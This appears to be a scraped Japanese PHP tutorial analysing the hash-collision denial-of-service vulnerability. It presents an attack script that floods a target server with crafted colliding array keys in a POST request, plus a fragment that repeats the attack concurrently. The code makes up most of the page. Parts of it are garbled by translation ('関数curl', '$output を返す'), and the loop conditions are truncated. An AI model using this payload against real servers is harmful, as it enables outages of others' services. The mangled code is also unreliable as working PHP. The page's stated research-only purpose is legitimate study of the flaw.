ホームページ  >  記事  >  バックエンド開発  >  ハッシュ競合の脆弱性を利用して DDoS 攻撃を実行する PHP の手法の分析_PHP チュートリアル

ハッシュ競合の脆弱性を利用して DDoS 攻撃を実行する PHP の手法の分析_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-13 10:00:11878ブラウズ

ハッシュ競合の脆弱性を利用して DDoS 攻撃を実行する PHP の手法の分析

この記事では、ハッシュ競合の脆弱性を利用して DDoS 攻撃を実行する PHP の手法を主に紹介し、ハッシュを使用して実行する PHP の原理と実装手法を分析します。 DDoS 攻撃を例とともに説明します。必要なものは、友人が参考にすることができます

この記事では、PHP がハッシュ競合の脆弱性を利用して DDoS 攻撃を実行する方法の分析例を提供します。参考のためにみんなで共有してください。具体的な分析は次のとおりです:

まず第一に、声明: この記事の内容は研究と学習のみを目的としており、違法行為には使用しないでください。

前述したように、最近出現したハッシュ テーブルの衝突の脆弱性は、Java、Python、php などを含む多くの一般的な言語に影響を与えています。今夜はその威力を実際に見ていきます。

攻撃原則:

慎重に組み立てられた一連の配列パラメータをターゲット サーバーにポストすることにより、基盤となる言語がサーバーに到達した後に受信した配列パラメーターを処理する際に、この脆弱性の存在により大量の CPU 消費が発生し、最終的にはサーバー リソースの枯渇につながります。 。
派手なトリックは必要ありません。PHP を使用して簡単に実装し、クリックするだけで効果を確認できます。

ファイル: dos.php

?

文例:ddos.php

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

//宛先住所

// ターゲットアドレスが存在する限り、それが何のためにあるかは関係ありません

$host = 'http://127.0.0.1/test.php';

$data = '';

$size = pow(2, 15);

for ($key=0, $max=($size-1)*$size; $key

{

$data .= '&array[' . $key .

}

$ret =curl($host, ltrim($data,'&'));

var_dump($ret);

関数curl($url, $post, $timeout = 30){

$ch =curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);

curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

$output =curl_exec($ch);

if ($output === false) return false;

$info =curl_getinfo($ch);

$http_code = $info['http_code'];

if ($http_code == 404) return false;

curl_close($ch);

$output を返す;

}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

DDOS

for($i=0; $i<5; $i++){//并発行数

echo '